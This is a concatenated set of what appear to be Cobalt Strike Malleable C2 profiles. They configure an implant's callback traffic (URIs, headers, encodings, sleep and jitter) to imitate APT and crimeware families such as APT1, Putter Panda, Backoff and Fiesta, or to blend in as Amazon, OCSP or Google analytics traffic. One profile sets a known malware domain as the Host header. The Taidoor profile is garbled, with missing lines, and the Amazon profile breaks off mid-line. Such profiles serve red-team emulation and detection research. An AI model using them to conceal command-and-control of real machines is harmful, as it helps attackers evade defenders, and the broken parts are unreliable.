├── APT ├── apt1_virtuallythere.profile ├── putter.profile ├── pitty_tiger.profile ├── string_of_paerls.profile ├── comfoo.profile ├── etumbot.profile ├── taidoor.profile ├── meterpreter.profile └── havex.profile ├── normal ├── rtmp.profile ├── ocsp.profile ├── randomized.profile ├── webbug.profile ├── amazon.profile ├── webbug_getonly.profile ├── safebrowsing.profile ├── pandora.profile ├── microsoftupdate_getonly.profile ├── gmail.profile ├── cnnvideo_getonly.profile ├── msnbcvideo_getonly.profile ├── googledrive_getonly.profile ├── bingsearch_getonly.profile ├── onedrive_getonly.profile ├── wikipedia_getonly.profile └── reference.profile └── crimeware ├── backoff.profile ├── fiesta2.profile ├── fiesta.profile ├── asprox.profile ├── magnitude.profile └── zeus.profile /APT/apt1_virtuallythere.profile: -------------------------------------------------------------------------------- 1 | # APT1 VIRTUALLYTHERE SSL 2 | # 3 | # Reference: Mandiant's APT1 Report 4 | # Digital Appendx F - SSL Certificates 5 | # http://intelreport.mandiant.com/ 6 | # 7 | # Author: @armitagehacker 8 | set sample_name "APT1 Virtually There Malware"; 9 | 10 | # this is the certificate 11 | https-certificate { 12 | set C "US"; 13 | set ST "Some-State"; 14 | set O "www.virtuallythere.com"; 15 | set OU "new"; 16 | set CN "new"; 17 | } 18 | 19 | # since *cough* presumably you're using an HTTPS Beacon... 20 | http-get { 21 | set uri "/zOMGAPT"; 22 | 23 | client { 24 | metadata { 25 | netbiosu; 26 | parameter "tmp"; 27 | } 28 | } 29 | 30 | server { 31 | header "Content-Type" "application/octet-stream"; 32 | 33 | output { 34 | print; 35 | } 36 | } 37 | } 38 | 39 | http-post { 40 | set uri "/BUYTHEAPTDETECTORNOW"; 41 | 42 | client { 43 | header "Content-Type" "application/octet-stream"; 44 | 45 | id { 46 | uri-append; 47 | } 48 | 49 | output { 50 | print; 51 | } 52 | } 53 | 54 | server { 55 | header "Content-Type" "text/html"; 56 | 57 | output { 58 | print; 59 | } 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /APT/putter.profile: -------------------------------------------------------------------------------- 1 | # Putter Panda HTTPCLIENT Profile 2 | # http://resources.crowdstrike.com/putterpanda/ 3 | # 4 | # Author: @armitagehacker 5 | 6 | # 500ms is default callback for this Web C2 shell 7 | set sample_name "Putter Panda"; 8 | 9 | set sleeptime "500"; 10 | 11 | http-get { 12 | # Beacon will randomly choose from this pool of URIs 13 | set uri "/MicrosoftUpdate/ShellEx/KB242742/default.aspx"; 14 | 15 | client { 16 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 17 | 18 | # deliberate attempt to reproduce bug in HTTPCLIENT 19 | header "Accept" "*/*, ..., ......, ."; 20 | 21 | # encode session metadata into tmp var 22 | metadata { 23 | netbiosu; 24 | parameter "tmp"; 25 | } 26 | } 27 | 28 | # no special server side indicators as the report didn't say anything one way 29 | # or the other about these. 30 | server { 31 | header "Content-Type" "application/octet-stream"; 32 | 33 | output { 34 | print; 35 | } 36 | } 37 | } 38 | 39 | http-post { 40 | set uri "/MicrosoftUpdate/GetUpdate/KB"; 41 | 42 | client { 43 | header "Content-Type" "application/octet-stream"; 44 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 45 | 46 | id { 47 | append "/default.asp"; 48 | uri-append; 49 | } 50 | 51 | output { 52 | print; 53 | } 54 | } 55 | 56 | server { 57 | header "Content-Type" "text/html"; 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /normal/rtmp.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Adode Real-Time-Messaging-Protcol (RTMP) profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "5000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Shockwave Flash"; 11 | 12 | http-get { 13 | 14 | set uri "/idle/1376547834/1"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "Connection" "Keep-Alive"; 20 | header "Cache-Control" "no-cache"; 21 | header "Content-Type" "application/x-fcs"; 22 | 23 | metadata { 24 | base64; 25 | header "Cookie"; 26 | } 27 | } 28 | 29 | server { 30 | 31 | header "Content-Type" "application/x-fcs"; 32 | header "Connection" "Keep-Alive"; 33 | header "Server" "FlashCom/3.5.7"; 34 | header "Cache-Control" "no-cache"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/send/1376547834/"; 45 | 46 | client { 47 | 48 | header "Accept" "*/*"; 49 | header "Connection" "Keep-Alive"; 50 | header "Cache-Control" "no-cache"; 51 | header "Content-Type" "application/x-fcs"; 52 | 53 | id { 54 | uri-append; 55 | } 56 | 57 | output { 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | 64 | header "Content-Type" "application/x-fcs"; 65 | header "Connection" "Keep-Alive"; 66 | header "Server" "FlashCom/3.5.7"; 67 | header "Cache-Control" "no-cache"; 68 | 69 | output { 70 | print; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /normal/ocsp.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Online Certificate Status Protocol (OCSP) Profile 3 | # http://tools.ietf.org/html/rfc6960 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "20000"; # Use a 20s interval 9 | set jitter "20"; # 20% jitter 10 | set maxdns "255"; 11 | set useragent "Microsoft-CryptoAPI/6.1"; 12 | 13 | 14 | http-get { 15 | 16 | set uri "/oscp/"; 17 | 18 | client { 19 | header "Accept" "*/*"; 20 | header "Host" "ocsp.verisign.com"; 21 | 22 | metadata { 23 | netbios; 24 | uri-append; 25 | } 26 | } 27 | 28 | server { 29 | header "Content-Type" "application/ocsp-response"; 30 | header "content-transfer-encoding" "binary"; 31 | header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate"; 32 | header "Connection" "keep-alive"; 33 | 34 | output { 35 | print; 36 | } 37 | } 38 | } 39 | 40 | http-post { 41 | 42 | set uri "/oscp/a/"; 43 | 44 | client { 45 | 46 | header "Accept" "*/*"; 47 | header "Host" "ocsp.verisign.com"; 48 | 49 | id { 50 | netbios; 51 | uri-append; 52 | } 53 | 54 | output { 55 | print; 56 | } 57 | } 58 | 59 | server { 60 | header "Content-Type" "application/ocsp-response"; 61 | header "content-transfer-encoding" "binary"; 62 | header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate"; 63 | header "Connection" "keep-alive"; 64 | 65 | output { 66 | print; 67 | } 68 | } 69 | } 70 | 71 | -------------------------------------------------------------------------------- /APT/pitty_tiger.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Pitty Tiger RAT profile 3 | # http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf 4 | # 5 | # One of several RATs used by the Pitty Tiger campaign 6 | # 7 | # Author: @harmj0y 8 | # 9 | set sample_name "Pitty Tiger RAT"; 10 | 11 | set sleeptime "30000"; # use a ~30s delay between callbacks 12 | set jitter "20"; 13 | set maxdns "255"; 14 | set useragent "Microsoft Internet Explorer"; 15 | 16 | http-get { 17 | 18 | set uri "/FC001/JOHN"; 19 | 20 | client { 21 | 22 | header "Host" "newb02.skypetm.com.tw"; 23 | header "Connection" "Keel-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Connection" "Keel-Alive"; 34 | header "Content-Type" "text/html"; 35 | header "Server" "IIS5.0"; 36 | 37 | output { 38 | base64; 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | set uri "/FC002/JOHN-"; 46 | 47 | client { 48 | 49 | header "Host" "newb02.skypetm.com.tw"; 50 | header "Connection" "Keel-Alive"; 51 | 52 | id { 53 | netbiosu; 54 | uri-append; 55 | } 56 | 57 | output { 58 | base64; 59 | print; 60 | } 61 | } 62 | 63 | server { 64 | 65 | header "Connection" "Keel-Alive"; 66 | header "Content-Type" "text/html"; 67 | header "Server" "IIS5.0"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | -------------------------------------------------------------------------------- /APT/string_of_paerls.profile: -------------------------------------------------------------------------------- 1 | # 2 | # String of Paerls profile 3 | # http://blogs.cisco.com/security/a-string-of-paerls/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "String of Paerls"; 8 | 9 | set sleeptime "30000"; # use a ~30 second main interval 10 | set jitter "30"; # 35% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0"; 13 | 14 | http-get { 15 | 16 | # GET request modeled as well as possible based on incomplete information 17 | set uri "/2/R.exe"; 18 | 19 | client { 20 | 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | 23 | # encode session metadata 24 | metadata { 25 | base64; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2"; 32 | header "X-Powered-By" "PHP/5.3.28"; 33 | header "Vary" "User-Agent"; 34 | header "Content-Type" "application/octet-stream"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/boss/image.php"; 45 | 46 | client { 47 | 48 | header "Content-Type" "application/x-www-form-urlencoded"; 49 | 50 | id { 51 | netbios; 52 | parameter "id"; 53 | } 54 | 55 | output { 56 | base64; 57 | print; 58 | } 59 | } 60 | 61 | server { 62 | header "Server" "Apache/2"; 63 | header "X-Powered-By" "PHP/5.3.28"; 64 | header "Vary" "User-Agent"; 65 | header "Content-Type" "application/octet-stream"; 66 | 67 | output { 68 | print; 69 | } 70 | } 71 | } 72 | 73 | -------------------------------------------------------------------------------- /crimeware/backoff.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Backoff POS Malware 3 | # 4 | # This profile takes steps to dress up the POST side of Beacon's C2 to 5 | # look like Backoff. The GET side is left generic. 6 | # 7 | # Indicators from: 8 | # http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html 9 | # https://gsr.trustwave.com/topics/backoff-pos-malware/backoff-malware-overview/ 10 | # 11 | # Author: @armitagehacker 12 | # 13 | # 14 | set sample_name "Backoff POS Malware"; 15 | 16 | set sleeptime "30000"; # use a ~30s delay between callbacks 17 | set jitter "10"; # throw in a 10% jitter 18 | 19 | set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"; 20 | 21 | # the relevant indicators 22 | http-post { 23 | set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php"; 24 | 25 | client { 26 | header "Accept" "text/plain"; 27 | header "Accept-Language" "en-us"; 28 | header "Accept-Encoding" "text/plain"; 29 | header "Content-Type" "application/x-www-form-urlencoded"; 30 | 31 | id { 32 | netbios; 33 | parameter "id"; 34 | } 35 | 36 | output { 37 | base64; 38 | prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data="; 39 | print; 40 | } 41 | } 42 | 43 | server { 44 | output { 45 | print; 46 | } 47 | } 48 | } 49 | 50 | # No information on backoff use of GET, so generic GET request. 51 | http-get { 52 | set uri "/updates"; 53 | 54 | client { 55 | metadata { 56 | netbiosu; 57 | prepend "user="; 58 | header "Cookie"; 59 | } 60 | } 61 | 62 | server { 63 | header "Content-Type" "text/plain"; 64 | 65 | output { 66 | base64; 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /normal/randomized.profile: -------------------------------------------------------------------------------- 1 | # 2 | # This profile demonstrates the use of the mask transform to randomize aspects of a profile 3 | # 4 | 5 | set useragent "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"; 6 | 7 | # define indicators for an HTTP GET 8 | http-get { 9 | # we require a stub URI to attach the rest of our data to. 10 | set uri "/zC"; 11 | 12 | client { 13 | # mask our metadata, base64 encode it, store it in the URI 14 | metadata { 15 | mask; 16 | base64url; 17 | uri-append; 18 | } 19 | } 20 | 21 | server { 22 | header "Content-Type" "text/plain"; 23 | 24 | # prepend some text in case the GET is empty. 25 | output { 26 | prepend "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 27 | mask; 28 | base64; 29 | print; 30 | } 31 | } 32 | } 33 | 34 | # define indicators for an HTTP POST 35 | http-post { 36 | set uri "/dE"; 37 | set verb "POST"; 38 | 39 | client { 40 | # make it look like we're posting something cool. 41 | header "Content-Type" "application/x-www-form-urlencoded"; 42 | 43 | # ugh, our data has to go somewhere! 44 | output { 45 | mask; 46 | base64url; 47 | uri-append; 48 | } 49 | 50 | # randomize and post our session ID 51 | id { 52 | mask; 53 | base64url; 54 | prepend "v="; 55 | append "&button=submit"; 56 | print; 57 | } 58 | } 59 | 60 | # The server's response to our HTTP POST 61 | server { 62 | header "Content-Type" "text/plain"; 63 | 64 | # post usually sends nothing, so let's prepend a string, mask it, and 65 | # base64 encode it. We'll get something different back each time. 66 | output { 67 | prepend "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 68 | mask; 69 | base64; 70 | print; 71 | } 72 | } 73 | } 74 | 75 | -------------------------------------------------------------------------------- /APT/comfoo.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Comfoo profile 3 | # http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "20"; 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)"; 12 | 13 | http-get { 14 | 15 | set uri "/CWoNaJLBo/VTNeWw11212/"; 16 | 17 | client { 18 | 19 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 20 | header "Accept-Language" "en-en"; 21 | header "Connection" "Keel-Alive"; 22 | header "Cache-Control" "no-cache"; 23 | 24 | metadata { 25 | netbiosu; 26 | append "/UTWOqVQ132/"; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "Apache/2.0.50 (Unix)"; 34 | header "Keep-Alive" "timeout=15, max=90"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/CWoNaJLBo/VTNeWw11213/"; 45 | 46 | client { 47 | 48 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 49 | header "Accept-Language" "en-en"; 50 | header "Connection" "Keel-Alive"; 51 | header "Cache-Control" "no-cache"; 52 | 53 | id { 54 | netbiosu; 55 | append "/UTWOqVQ132/"; 56 | uri-append; 57 | } 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | 64 | server { 65 | 66 | header "Server" "Apache/2.0.50 (Unix)"; 67 | header "Keep-Alive" "timeout=15, max=90"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | -------------------------------------------------------------------------------- /APT/etumbot.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Etumbot Profile 3 | # http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Etumbot"; 8 | 9 | set sleeptime "5000"; 10 | set jitter "0"; 11 | set maxdns "255"; 12 | set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; 13 | 14 | http-get { 15 | 16 | set uri "/image/"; 17 | 18 | client { 19 | 20 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8"; 21 | header "Referer" "http://www.google.com"; 22 | header "Pragma" "no-cache"; 23 | header "Cache-Control" "no-cache"; 24 | 25 | metadata { 26 | netbios; 27 | append "-.jpg"; 28 | uri-append; 29 | } 30 | } 31 | 32 | server { 33 | 34 | header "Content-Type" "img/jpg"; 35 | header "Server" "Microsoft-IIS/6.0"; 36 | header "X-Powered-By" "ASP.NET"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | set uri "/history/"; 47 | 48 | client { 49 | 50 | header "Content-Type" "application/octet-stream"; 51 | header "Referer" "http://www.google.com"; 52 | header "Pragma" "no-cache"; 53 | header "Cache-Control" "no-cache"; 54 | 55 | id { 56 | netbiosu; 57 | append ".asp"; 58 | uri-append; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Content-Type" "img/jpg"; 70 | header "Server" "Microsoft-IIS/6.0"; 71 | header "X-Powered-By" "ASP.NET"; 72 | 73 | output { 74 | base64; 75 | print; 76 | } 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /crimeware/fiesta2.profile: -------------------------------------------------------------------------------- 1 | # 2 | # A second Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Fiesta Exploit Kit"; 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "10"; # throw in a 10% jitter 11 | set maxdns "255"; 12 | 13 | http-get { 14 | 15 | set uri "/v20idaf/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "*/*"; 20 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";112202;228"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "nginx/1.4.4"; 32 | header "Content-Type" "application/octet-stream"; 33 | header "Connection" "close"; 34 | 35 | output { 36 | print; 37 | } 38 | } 39 | } 40 | 41 | http-post { 42 | 43 | set uri "/"; 44 | 45 | client { 46 | 47 | header "Accept" "*/*"; 48 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 49 | 50 | id { 51 | netbios; 52 | uri-append; 53 | } 54 | 55 | output { 56 | base64; 57 | print; 58 | } 59 | } 60 | 61 | server { 62 | header "Server" "nginx/1.4.4"; 63 | header "Content-Type" "application/octet-stream"; 64 | header "Connection" "close"; 65 | 66 | output { 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /crimeware/fiesta.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "10"; # throw in a 10% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"; 12 | 13 | http-get { 14 | 15 | set uri "/rmvk30g/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"; 20 | header "Connection" "keep-alive"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";1;4;1"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2.2.15 (CentOS)"; 32 | header "X-Powered-By" "PHP/5.3.27"; 33 | header "Content-Type" "application/octet-stream"; 34 | header "Connection" "close"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/"; 45 | 46 | client { 47 | 48 | # fake out a different user agent for the post back 49 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"; 50 | 51 | id { 52 | netbios; 53 | uri-append; 54 | } 55 | 56 | output { 57 | base64; 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | header "Server" "nginx/1.4.2"; 64 | header "Content-Type" "text/html"; 65 | header "Connection" "close"; 66 | 67 | output { 68 | base64; 69 | print; 70 | } 71 | } 72 | } 73 | 74 | -------------------------------------------------------------------------------- /normal/webbug.profile: -------------------------------------------------------------------------------- 1 | # make our C2 look like a Google Web Bug 2 | # https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting 3 | # 4 | # Author: @armitagehacker 5 | 6 | http-get { 7 | set uri "/__utm.gif"; 8 | client { 9 | parameter "utmac" "UA-2202604-2"; 10 | parameter "utmcn" "1"; 11 | parameter "utmcs" "ISO-8859-1"; 12 | parameter "utmsr" "1280x1024"; 13 | parameter "utmsc" "32-bit"; 14 | parameter "utmul" "en-US"; 15 | 16 | metadata { 17 | netbios; 18 | prepend "__utma"; 19 | parameter "utmcc"; 20 | } 21 | } 22 | 23 | server { 24 | header "Content-Type" "image/gif"; 25 | 26 | output { 27 | # hexdump pixel.gif 28 | # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 29 | # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 30 | # 0000020 01 00 01 00 00 02 01 44 00 3b 31 | 32 | prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"; 33 | prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"; 34 | prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"; 35 | 36 | print; 37 | } 38 | } 39 | } 40 | 41 | http-post { 42 | set uri "/___utm.gif"; 43 | client { 44 | header "Content-Type" "application/octet-stream"; 45 | 46 | id { 47 | prepend "UA-220"; 48 | append "-2"; 49 | parameter "utmac"; 50 | } 51 | 52 | parameter "utmcn" "1"; 53 | parameter "utmcs" "ISO-8859-1"; 54 | parameter "utmsr" "1280x1024"; 55 | parameter "utmsc" "32-bit"; 56 | parameter "utmul" "en-US"; 57 | 58 | output { 59 | print; 60 | } 61 | } 62 | 63 | server { 64 | header "Content-Type" "image/gif"; 65 | 66 | output { 67 | prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"; 68 | prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"; 69 | prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"; 70 | print; 71 | } 72 | } 73 | } 74 | 75 | # dress up the staging process too 76 | http-stager { 77 | server { 78 | header "Content-Type" "image/gif"; 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /crimeware/asprox.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Asprox botnet traffic profile 3 | # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Asprox Botnet"; 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "20"; # throw in a 10% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"; 13 | 14 | http-get { 15 | 16 | set uri "/"; 17 | 18 | client { 19 | 20 | header "Accept" "*/*"; 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | header "Content-Transfer-Encoding" "base64"; 23 | header "Connection" "Keep-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "nginx/1.2.5"; 34 | header "Content-Type" "text/html"; 35 | header "X-Powered-By" "PHP/5.4.4-7"; 36 | header "Vary" "Accept-Encoding"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | # random hash to try to simulate the post uri in the report 48 | set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1"; 49 | 50 | client { 51 | 52 | header "Accept" "*/*"; 53 | header "Content-Type" "application/x-www-form-urlencoded"; 54 | header "Content-Transfer-Encoding" "base64"; 55 | header "Connection" "Keep-Alive"; 56 | 57 | id { 58 | parameter "id"; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Server" "nginx/1.2.5"; 70 | header "Content-Type" "text/html"; 71 | header "X-Powered-By" "PHP/5.4.4-7"; 72 | header "Vary" "Accept-Encoding"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | } 80 | 81 | -------------------------------------------------------------------------------- /crimeware/magnitude.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Magnitude Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/06/17/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Magnitude Exploit Kit"; 8 | 9 | set sleeptime "45000"; # use a ~45s delay between callbacks 10 | set jitter "50"; # throw in a 50% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 13 | 14 | http-get { 15 | 16 | set uri "/themes/index.php"; 17 | 18 | client { 19 | 20 | header "Accept" "image/jpeg, application/*"; 21 | header "Referer" "http://www.bankofbotswana.bw/"; 22 | header "Accept-Encoding" "gzip, deflate"; 23 | 24 | # throw in a known bad malware domain 25 | header "Host" "wilfredcostume.bamoon.com"; 26 | 27 | metadata { 28 | netbios; 29 | parameter "id"; 30 | } 31 | } 32 | 33 | server { 34 | header "Server" "Apache/2.2.17 (Ubuntu)"; 35 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 36 | header "Content-Encoding" "gzip"; 37 | header "Content-Type" "text/html"; 38 | 39 | output { 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | set uri "/work/1.php"; 48 | 49 | client { 50 | 51 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 52 | header "Accept-Language" "en-US;q=0.5,en;q=0.3"; 53 | header "Accept-Encoding" "gzip, deflate"; 54 | header "Content-Type" "application/octet-stream"; 55 | 56 | id { 57 | netbiosu; 58 | parameter "sid"; 59 | } 60 | 61 | output { 62 | print; 63 | } 64 | } 65 | 66 | server { 67 | 68 | header "Server" "Apache/2.2.17 (Ubuntu)"; 69 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 70 | header "Content-Encoding" "gzip"; 71 | header "Content-Type" "text/html"; 72 | 73 | output { 74 | print; 75 | } 76 | } 77 | } 78 | 79 | -------------------------------------------------------------------------------- /APT/taidoor.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Taidoor Profile 3 | # http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Taidoor"; 8 | 9 | set sleeptime "40000"; # use a ~40 second main interval 10 | set jitter "35"; # 35% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 13 | 14 | http-get { 15 | 16 | set uri "/login.jsp /parse.jsp /page.jsp /default.jsp /index.jsp /process.jsp /security.jsp /user.jsp"; 17 | 18 | client { 19 | 20 | header "Connection" "Keep-Alive"; 21 | header "Cache-Control" "no-cache"; 22 | 23 | # encode session metadata 24 | metadata { 25 | netbiosu; 26 | parameter "mn"; 27 | } 28 | } 29 | 30 | # no special server side indicators as the report didn't say anything one way 31 | # or the other about these. 32 | server { 33 | header "Server" "Microsoft-IIS/5.0"; 34 | header "Content-Type" "text/html"; 35 | header "Connection" "close"; 36 | 37 | output { 38 | base64; 39 | prepend "\n"; 44 | append "\n"; 45 | append "\n"; 46 | print; 47 | } 48 | } 49 | } 50 | 51 | http-post { 52 | set uri "/submit.jsp"; 53 | 54 | client { 55 | 56 | header "Connection" "Keep-Alive"; 57 | header "Cache-Control" "no-cache"; 58 | 59 | id { 60 | netbios; 61 | parameter "du"; 62 | } 63 | 64 | output { 65 | print; 66 | } 67 | } 68 | 69 | server { 70 | header "Server" "Microsoft-IIS/5.0"; 71 | header "Content-Type" "text/html"; 72 | header "Connection" "close"; 73 | 74 | output { 75 | print; 76 | } 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /normal/amazon.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Amazon browsing traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "5000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 | 14 | set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "Host" "www.amazon.com"; 20 | 21 | metadata { 22 | base64; 23 | prepend "session-token="; 24 | prepend "skin=noskin;"; 25 | append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996"; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | 32 | header "Server" "Server"; 33 | header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT"; 34 | header "x-amz-id-2" 